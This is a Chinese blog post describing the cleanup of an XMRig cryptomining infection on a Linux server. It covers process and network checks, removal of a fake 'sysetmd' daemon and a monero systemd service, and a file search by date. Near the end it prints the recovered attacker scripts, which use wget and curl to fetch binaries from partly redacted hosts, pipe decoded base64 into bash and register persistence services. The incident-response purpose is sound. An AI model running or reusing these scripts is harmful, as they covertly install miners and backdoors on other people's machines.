Xmrig挖矿入侵服务器排查

已于 2024-04-05 20:23:49 修改
阅读量476 收藏 5
点赞数 6
文章标签: 服务器 chrome 运维
于 2024-03-19 22:48:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26624329/article/details/136857907
版权

Xmrig挖矿入侵服务器排查

type: Post
status: Published
date: 2024/03/19
slug: 240319-xmrig
tags: 建站, 开发, 推荐
category: 技术分享

契机

问题

Untitled

排查思路

#上去服务器先看看这个文件
ps aux | grep xmrig

Untitled

#排查下pid关联的文件 -> 没啥收获
ll /proc/{pid}/fd 
#查看网络链接,记住关键ip
netstat -tunap | grep {pid}
#kill再说
kill -9 {pid}
#然后全局查找文件(这里要记住文件大概什么时候创建的)
find / -name xmrig
#rm -rf xmrig相关
rm -rf {xxxx}
#检查下定时任务,该取消就取消
crontab -l
#再检查下xmrig相关后台程序 -> 我这里使用xmrig关键字没搜到
systemctl list-units --type=service  | grep xmrig

不出意外的话,5分钟后xmrig又被拉起来了,现在我们知道他有守护程序了。

#查询服务器网络链接,看起来可疑ip记录下pid
netstat -tunap 
#看看所有的程序
ps aux
#以上两个步骤我基本确定下面这个pid很可疑,在看下文件创建时间,与xmrig创建时间一致
/opt/sysetmd 9x25 481.x1.x1.4x
#依然看看关联文件->没收获
ll /proc/{pid}/fd 
#再kill掉
kill -9 {pid}
#删除文件sysetmd相关
rm -rf {xxxx}
#再去找自启动服务 这个确实找到了
systemctl list-units --type=service  | grep sysetmd

Untitled

#直接给他停掉
systemctl stop  sysetmd.service
systemctl disable sysetmd.service
rm -f /etc/systemd/system/sysetmd.service

额外收获,发现/etc/systemd/system下有个自启动的service名字和创建时间很可疑

Untitled

#cat查看下
cat monero.service

#文件内容如下,发现xmrig就是这个拉起来的
[Unit]
Description=Monero miner service node

[Service]
ExecStart=/root/xmrig-6.21.1/xmrig --donate-level 1 -o xxxxxxx
Restart=always

[Install]

#直接给他停掉
systemctl stop  monero.service
systemctl disable monero.service
rm /etc/systemd/system/monero.service

#然后持续观察以下内容
ps aux 
top -c
netstat -tunap

最后防止还有其他守护程序被拉起来,再看看对应时间点有哪些文件增加

#查找某个时间段的文件
#忽略/proc文件夹
find / -type d \( -path /proc -o -path /var/lib/docker -o -path /mnt/www/docker -o -path /usr/local/aegis  \) -prune -o -type f -newermt "2024-03-18 00:00:00" ! -newermt "2024-03-19 00:00:00" -print

Untitled

#找到wawa.sh和update_udp.sh很可疑

#wawa.sh如下
cd /root;
wget http://1187xxxxxom/xmrig-6.21.1-linux-static-x64.tar.gz;
tar -zxvf xmrig-6.21.1-linux-static-x64.tar.gz;
systemctl stop monero.service;
rm -rf /etc/systemd/system/monero.service;
wget http://xxxxon/monero.service;
sysctl -w vm.nr_hugepages=$((1168+$(nproc)));
mv monero.service /etc/systemd/system/monero.service;
systemctl daemon-reload;
systemctl enable monero.service;
systemctl start monero.service

#update_udp.sh如下
echo "xxxx==base64encodeexxxxxx"|base64 -di|bash -s
#base64解谜如下
curl -s http:/x7/libhv.so -o /opt/libhv.so;
cp /opt/libhv.so /usr/lib/libhv.so;
cp /opt/libhv.so /usr/lib64/libhv.so;
curl -s http://bpxysetmd -o /opt/sysetmd;
chmod 777 /opt/sysetmd;
curl -s http://bpgx27/sysetmd.service -o /etc/systemd/system/sysetmd.service;systemctl daemon-reload;
systemctl enable sysetmd.service;
systemctl start sysetmd.service;

发现和我清除的一致,再持续观察一段时间,还有这个人是真的蠢,为什么部署sh还要留下

总结

  • 找被黑时间左右的所有文件一个一个排查
  • 找文件关联pid
  • 找pid关联fd,端口,ip等
  • 找相关service,排查异常servcie,定时任务全部停止
  • 持续观察cpu,网络等信息

写到最后

  • https://bothsavage.github.io/

Untitled

BothSavage
关注
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xmrig挖矿病毒彻底清除
mynameisjinxiaokai的博客
04-20 5596
1、通过top命令查看进程发现,占用CPU最大的进程是一个叫xmrig的进程。3、最后一定要修改机器密码,不然过几天还会存在。2、找到xmrig所在的文件并删除。记录下进程的PID,然后杀死进程。
xmrig-6.12.0-gcc-win64_xmrig_
10-04
xmrig 6.12.0 windows x64
阿里云服务器中招挖矿病毒XMrig miner解决方法
热门推荐
Starbme_2018的博客
03-18 1万+
今天阿里云的项目经理给我打电话问我的服务器是否没有使用计划,确实自从上次中毒后就没再使用。今天登录阿里云服务器 WindowsServer2012 远程桌面,发现XMrig miner.exe cpu进程占用高达80%以上,cpu总占用达到99%,查了下时间是昨天十点开始进程占用率奇高的,因此我知道头痛的事情又来了:挖矿病毒又回来了。。。 查了一下告警信息,如下: 该告警由如下引擎检测发现:...
阿里云服务器xmrig矿毒
qq_35692783的博客
09-27 1248
今天访问云服务器的时候,命令输入很慢,于是输入top查看进程运行情况,发现有个名叫xmrig的进程占用CPU占90+%以上。 百度查了一下发现是挖矿的,应该是上次安装redis后没设置访问密码的原因。 先是尝试用 kill -9 进程ID 杀掉,结果又有新的xmrig产生了,于是就查看这个进程的执行文件在哪里,然后把这个目录下的文件全都删掉。 /proc/进程ID/exe rm -rf /root/.c3pool 输入top之后发现还存在,再次尝试kill,成功杀死并且没有新的进程产生了。 网上说可能
博客被挖矿程序xmrig入侵以及我的解决方案(docker安全)
马赛琦的博客
09-03 7880
文章记录了一次由于Docker配置的漏洞导致的挖矿程序入侵的发现过程以及解决方案。由于本人时间有限,没有时间去深度学习linux的相关运维知识,所以解决方案可能是比较浅显的,还望您在阅读本文前知悉。 前言 2019年9月2日凌晨,我正准备关闭电脑睡觉,突然收到阿里云的一条短信,说是服务器挖矿软件入侵了,一开始我是不相信的,就我这草履虫一样的网站,应该没有任何会来才对啊,后来查看了一下阿里云后...
服务器挖矿了怎么办,实战清退
qq_14926283的博客
03-25 930
然后看看有没有定时任务,有的时候它会定时去检测xmrig挖矿木马是否在正常运行,不正常它会重新去做一系列的处理,重新植入木马,这时候我们要去取消这些定时任务。注意这些看起来像系统进程的最好不要kill掉,容易出现意外,把生产环境的服务给干费了,那我们得去删掉这个后门用户怎么办。可以看到我这边有一个名为xmrig(有经验的这里看到名字直接就能判断)的进程霸占了100.3的资源,这里中招了。第一时间重启服务是不行的,这些挖矿木马一定是会伴随着你的重启而自动重启,一定时间内重新霸占你的服务器资源。
阿里轻量服务器xmrig挖矿病毒排查处理
ZHUMUYI0的博客
12-04 768
本人的轻量服务器没有在运行的应用,纯用来当部署用的公网测试机,突然发现其中一颗CPU核心使用率已经到100。
【记一次真实的挖矿病毒应急响应】
一纸荒芜的博客
03-25 791
分享一起真实的挖矿病毒应急响应案例
Linux服务器清除xmrig挖矿病毒详细教程
似梦初觉的博客
11-04 8383
近期遇到很多小伙伴在咨询服务器CPU被占满,排查后发现中了xmrig挖矿病毒,并且通过kill 杀掉进程后,还会自动启动。这是由于只是停止了xmrig挖矿病毒的进,没有彻底删除病毒文件,导致会病毒会自动重启进程。
阿里云dos木马及xmrig矿毒
xn1014的博客
01-30 309
删除定时任务cat /etc/crontab,cat /var/spool/cron,删除脚本。修改定时任务权限 chattr +i /etc/crontab。top |grep dos,查询出pid。kill -9 pid杀死进程。找到对应的exe木马位置。rm -rf 删除木马。
服务器入侵痕迹排查.pdf
08-25
服务器入侵痕迹排查.pdf
Linux入侵排查.docx
05-07
Linux入侵排查
Linux操作系统安全及入侵排查
09-30
课程还介绍了针对系统入侵的应急排查步骤和要求,主要涉及的排查内容包括:检查系统日志及命令记录 、检查账户、检查文件、检查系统启动项和计划任务、检查进程和网络连接、检查是否存留后门等恶意程序,根据上述...
【应急响应】Linux入侵排查思路
09-18
【应急响应】Linux入侵排查思路: 当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第...针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些 Linux 服务器入侵排查的思路。
linux入侵排查(操作截图).docx
07-10
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为...
【linux】Bad owner or permissions on
codears的博客
04-23 182
我们查看他的权限时发现它所链接的文件权限为777。
1. 2XX (Success 成功状态码)
最新发布
2402_83160520的博客
04-23 230
状态码2XX表示请求被正常处理了。
3节点ubuntu24.04服务器docker-compose方式部署高可用elk+kafka日志系统并接入nginx日志
qq_41905051的博客
04-23 1062
3节点ubuntu24.04服务器docker-compose方式部署高可用elk+kafka日志系统并接入nginx日志
linux挖矿病毒排查
12-07
Linux系统中挖矿病毒的排查可以通过以下步骤进行: 1.使用top命令查看系统资源占用情况,如果发现CPU、内存、网络等资源占用率异常高,可能存在挖矿病毒。 2.使用netstat命令查看网络连接情况,如果发现大量连接到疑似挖矿池的IP地址,可能存在挖矿病毒。 3.使用ps命令查看进程情况,如果发现疑似挖矿程序的进程,可以使用kill命令结束进程。 4.使用clamscan命令对系统进行病毒扫描,可以检测出挖矿病毒等恶意软件。 5.使用安全加固工具对系统进行加固,例如关闭不必要的服务、更新系统补丁、设置防火墙等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值